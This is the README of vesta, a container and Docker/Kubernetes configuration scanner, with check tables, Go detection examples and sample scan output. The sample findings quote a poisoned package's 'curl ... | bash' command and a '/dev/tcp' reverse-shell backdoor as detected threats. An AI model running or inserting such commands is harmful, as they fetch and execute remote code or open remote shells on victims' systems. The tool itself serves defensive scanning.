Overview
vesta is a tool that combines container scanning with Docker and Kubernetes configuration baseline checks. It inspects images and containers for components of vulnerable versions, and checks Docker and Kubernetes for dangerous configurations based on hands-on cloud penetration-testing experience.
vesta is also a flexible and convenient tool that runs on a variety of systems, including but not limited to Windows, Linux and macOS.
Check items
Scan
- Scan for vulnerabilities in programs installed through the mainstream package managers
  - apt/apt-get
  - rpm
  - yum
  - dpkg
- Scan for vulnerable software dependencies and maliciously poisoned dependency packages
  - Java (Jar, War, and the widely used log4j dependency)
  - NodeJs (NPM, YARN)
  - Python (Wheel, Poetry)
  - Golang (Go binary)
  - PHP (Composer, and the main PHP frameworks: laravel, thinkphp, wordpress, wordpress plugins, etc.)
  - Rust (Rust binary)
Docker checks

| Supported | Check Item | Description | Severity | Reference |
|---|---|---|---|---|
| ✔ | PrivilegeAllowed | Dangerous privileged mode | critical | Ref |
| ✔ | Capabilities | Dangerous capabilities are set | critical | Ref |
| ✔ | Volume Mount | A sensitive or dangerous directory is mounted | critical | Ref |
| ✔ | Docker Unauthorized | Port 2375 is open and unauthenticated | critical | Ref |
| ✔ | Kernel version | The current kernel version has a container-escape vulnerability | critical | Ref |
| ✔ | Network Module | Network mode is host, or host mode together with a specific containerd version | critical/medium | |
| ✔ | Pid Module | Pid mode is set to host | high | |
| ✔ | Docker Server version | The Docker Server version is vulnerable | critical/high/medium/low | |
| ✔ | Docker env password check | Whether the Docker env contains weak passwords | high/medium | |
| ✔ | Docker history | Docker layers contain unsafe commands | high/medium | |
| ✔ | Docker Backdoor | The Docker env or command contains malicious commands | critical/high | |
| ✔ | Docker Swarm | Docker Swarm has dangerous configuration, plus detection of dangerous containers | medium/low | |
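As an added illustration (not vesta's own code), the Go function below applies the first five checks of the table above (privileged mode, dangerous capabilities, sensitive volume mounts, host network mode and host PID mode) to the HostConfig section of `docker inspect` output. The capability and path lists are constructed assumptions, not the lists vesta uses.

```go
package main

import (
	"encoding/json"
	"strings"
)

// Subset of `docker inspect` HostConfig; encoding/json matches keys by field name.
type hostConfig struct {
	Privileged           bool
	CapAdd, Binds        []string
	NetworkMode, PidMode string
}
// One baseline finding; severities follow the Docker check table above.
type finding struct{ Param, Value, Severity string }
// Constructed lists (not vesta's own): escape-enabling caps and host paths.
var dangerousCaps = map[string]bool{"SYS_ADMIN": true, "SYS_PTRACE": true, "SYS_MODULE": true, "DAC_READ_SEARCH": true, "ALL": true}
var sensitivePaths = []string{"/", "/etc", "/proc", "/root", "/var/run/docker.sock", "/var/lib/docker"}

// checkHostConfig runs the privileged, capability, network/pid mode and volume-mount checks.
func checkHostConfig(inspectJSON []byte) ([]finding, error) {
	var c struct{ HostConfig hostConfig }
	if err := json.Unmarshal(inspectJSON, &c); err != nil {
		return nil, err
	}
	h, out := c.HostConfig, []finding{}
	if h.Privileged {
		out = append(out, finding{"Privileged", "true", "critical"})
	}
	for _, name := range h.CapAdd { // docker accepts both "SYS_ADMIN" and "CAP_SYS_ADMIN"
		if dangerousCaps[strings.TrimPrefix(strings.ToUpper(name), "CAP_")] {
			out = append(out, finding{"Capabilities", name, "critical"})
		}
	}
	if h.NetworkMode == "host" {
		out = append(out, finding{"Network Module", "host", "critical"})
	}
	if h.PidMode == "host" {
		out = append(out, finding{"Pid Module", "host", "high"})
	}
	for _, b := range h.Binds { // bind syntax: "host-src:container-dst[:options]"
		src := strings.SplitN(b, ":", 2)[0]
		for _, p := range sensitivePaths {
			if src == p || (p != "/" && strings.HasPrefix(src, p+"/")) {
				out = append(out, finding{"Volume Mount", b, "critical"})
				break
			}
		}
	}
	return out, nil
}
```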
Kubernetes checks

| Supported | Check Item | Description | Severity | Reference |
|---|---|---|---|---|
| ✔ | PrivilegeAllowed | Dangerous privileged mode | critical | Ref |
| ✔ | Capabilities | Dangerous capabilities are set | critical | Ref |
| ✔ | PV and PVC | A PV is mounted on a sensitive directory and its status is active | critical/medium | Ref |
| ✔ | RBAC | K8s permissions have dangerous configuration | high/medium/low/warning | |
| ✔ | Kubernetes-dashboard | Checks -enable-skip-login and the dashboard account's permissions | critical/high/low | Ref |
| ✔ | Kernel version | The current kernel version has a container-escape vulnerability | critical | Ref |
| ✔ | Docker Server version (k8s version lower than v1.24) | The Docker Server version is vulnerable | critical/high/medium/low | |
| ✔ | Kubernetes certification expiration | A certificate expires in less than 30 days | medium | |
| ✔ | ConfigMap and Secret check | Whether a ConfigMap or Secret contains weak passwords | high/medium | |
| ✔ | PodSecurityPolicy check (k8s version below v1.25) | The PodSecurityPolicy is over-tolerant of insecure Pod configuration | high/medium/low | Ref |
| ✔ | Auto Mount ServiceAccount Token | The Pod mounts the service account token by default | critical/high/medium/low | Ref |
| ✔ | NoResourceLimits | Resource usage is not limited, e.g. CPU, memory, storage | low | Ref |
| ✔ | Job and Cronjob | A Job or CronJob has no seccomp or SELinux security policy set | low | Ref |
| ✔ | Envoy admin | Envoy admin is configured and listens on 0.0.0.0 | high/medium | Ref |
| ✔ | Cilium version | The Cilium version is vulnerable | critical/high/medium/low | Ref |
| ✔ | Istio configurations | Istio vulnerable-version and security configuration checks | critical/high/medium/low | Ref |
| ✔ | Kubelet 10255/10250 and Kubectl proxy | A node has 10250 or 10255 open and unauthenticated, or kubectl proxy is enabled | high/medium/low | |
| ✔ | Etcd configuration | Etcd security configuration check | high/medium | |
| ✔ | Sidecar configurations | Sidecar security configuration and Env check | critical/high/medium/low | |
| ✔ | Pod annotation | A Pod annotation has insecure configuration | high/medium/low/warning | Ref |
| ✔ | DaemonSet | A DaemonSet has insecure configuration | critical/high/medium/low | |
| ✔ | Backdoor | Checks whether there is a backdoor in k8s | critical/high | Ref |
| ✔ | Lateral admin movement | A Pod is deliberately scheduled onto the Master node | medium/low | |
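The weak-password checks in both tables (Docker env and image history on the Docker side; ConfigMap, Secret and sidecar env on the Kubernetes side) share one problem: pulling a credential out of free-form config text and judging it. The Go example below is an added illustration, not vesta's code; the two regular expressions and the weakness heuristic are assumptions, exercised on inputs shaped like the sample findings shown later on this page.

```go
package main

import (
	"regexp"
	"strings"
	"unicode"
)

// A weak credential found in one config source (env string, ConfigMap or
// Secret data, Docker image history command); the check tables rate it high.
type credFinding struct{ Source, Key, Value string }

var (
	// user:password@host inside a connection URL (the ConfigMap case)
	urlCred = regexp.MustCompile(`://([^:/@\s]+):([^@\s]+)@`)
	// DB_PASSWORD=..., password: ..., Token:... in env, YAML data or shell text
	kvCred = regexp.MustCompile(`(?i)([A-Z_.-]*(pass(word|wd)?|pwd|token|secret)[A-Z_.-]*)\s*[=:]\s*['"]?([^'"\s;&|]+)`)
	// constructed stand-in for a real weak-password wordlist
	commonWords = " password passwd test admin root welcome qwerty "
)

// weakPassword: shorter than 8, fewer than three character classes, or a
// common word followed only by digits (Password123, test123456, ...).
func weakPassword(p string) bool {
	classes := 0
	for _, f := range []func(rune) bool{unicode.IsUpper, unicode.IsLower, unicode.IsDigit, unicode.IsPunct} {
		if strings.IndexFunc(p, f) >= 0 {
			classes++
		}
	}
	stem := strings.ToLower(strings.TrimRight(p, "0123456789"))
	return len(p) < 8 || classes < 3 || strings.Contains(commonWords, " "+stem+" ")
}

// findWeakCredentials scans free text from one source and returns each
// embedded credential that fails the heuristic (Key: data key or URL user).
func findWeakCredentials(source, text string) []credFinding {
	var out []credFinding
	for _, r := range []struct {
		re   *regexp.Regexp
		k, v int
	}{{urlCred, 1, 2}, {kvCred, 1, 4}} {
		for _, m := range r.re.FindAllStringSubmatch(text, -1) {
			if weakPassword(m[r.v]) {
				out = append(out, credFinding{source, m[r.k], m[r.v]})
			}
		}
	}
	return out
}
```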
Building and using vesta
Building vesta
- Build with make build
- Download the executable from Releases
Use vesta to scan an image or container for vulnerable component versions (an image ID, an image tag, or a file passed with -f all work):
$./vesta scan container -f example.tar
2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer
Detected 216 vulnerabilities
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. If |
| | | | | | | django.utils.text.Truncator's |
| | | | | | | chars() and words() methods |
| | | | | | | were passed the html=True |
| | | | | | | argument, t ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered |
| | | | | | | in Django 1.11.x before |
| | | | | | | 1.11.23, 2.1.x before 2.1.11, |
| | | | | | | and 2.2.x before 2.2.4. |
| | | | | | | Due to the behaviour of |
| | | | | | | the underlying HTMLParser, |
| | | | | | | django.utils.html.strip_tags |
| | | | | | | would be extremely ... |
+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in |
| | | | | | | Django 1.11.x before 1.11.23, |
| | | | | | | 2.1.x before 2.1.11, and 2.2.x |
| | | | | | | before 2.2.4. Due to an error |
| | | | | | | in shallow key transformation, |
| | | | | | | key and index lookups for |
| | | | | | | django.contrib.postgres.f ... |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in |
| | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', |
| | | | | | | malicious command "curl https://vuln.com | bash" are |
| | | | | | | detected. |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
Use vesta to check the Docker baseline configuration
It can also be run inside docker:
make run.docker
$./vesta analyze docker
2022/11/29 23:06:32 Start analysing
Detected 3 vulnerabilities
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: None | | | | the CVE-2022-0492 with |
| | | | | | CAP_SYS_ADMIN and v1 |
| | | | | | architecture of cgroups |
| | | | | | vulnerablility, has a |
| | | | | | potential container escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 3 | Name: Image Tag | Privileged | true | critical | There has a potential container|
| | ID: None | | | | escape in privileged module. |
| | | | | | |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found |
| | ID: None | | vesta_history_test:latest | | | in command: ' echo |
| | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > |
| | | | | | config.ini # buildkit'. |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
Use vesta to check the Kubernetes baseline configuration
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version
Detected 4 vulnerabilities
Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential |
| | default | Status: Running | | Privileged | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has |
| | | env | | | | found weak password: |
| | | | | | | 'Password123456'. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds |
| | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: |
| | | | | | | 0.91 out of 1.0), which is a |
| | | | | | | suspect command backdoor. |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential |
| | default | Status: Running | | capabilities | | | | container escape in privileged |
| | Node Name: docker-desktop | | | | | module. |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account |
| | | automountServiceAccountToken | | | | and key permission are |
| | | | | | | given, which will cause a |
| | | | | | | potential container escape. |
| | | | | | | Reference clsuterRolebind: |
| | | | | | | vuln-clusterrolebinding | |
| | | | | | | roleBinding: vuln-rolebinding |
+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. |
| | | Resource | | | | |
| | | | | | | |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |
| | | | | | the CVE-2022-0185 with |
| | | | | | CAP_SYS_ADMIN vulnerablility, |
| | | | | | has a potential container |
| | | | | | escape. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak |
| | | Namespace: default | | | password: 'Password123'. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key |
| | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the |
| | | rolename: vuln-clusterrole | | pods, services | | default service account, which |
| | | kind: ClusterRole | subject | | | will cause a potential data |
| | | kind: Group | subject name: | | | leakage. |
| | | system:serviceaccounts:vuln | | | | |
| | | namespace: vuln | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key |
| | | | rolename: vuln-role | role | create, update | resources: | | resources given to the |
| | | kind: Role | subject kind: | pods, services | | default service account, which |
| | | ServiceAccount | subject name: | | | will cause a potential data |
| | | default | namespace: default | | | leakage. |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given |
| | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', |
| | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. |
| | | subject kind: User | subject | | | |
| | | name: testUser | namespace: | | | |
| | | all | | | |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
Usage
$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
Tutorial is available at https://github.com/kvesta/vesta
Usage:
vesta [command]
Available Commands:
analyze Kubernetes analyze
completion Generate the autocompletion script for the specified shell
help Help about any command
scan Container scan
update Update vulnerability database
version Print version information and quit
Flags:
-h, --help help for vesta
Project address: https://github.com/kvesta/vesta/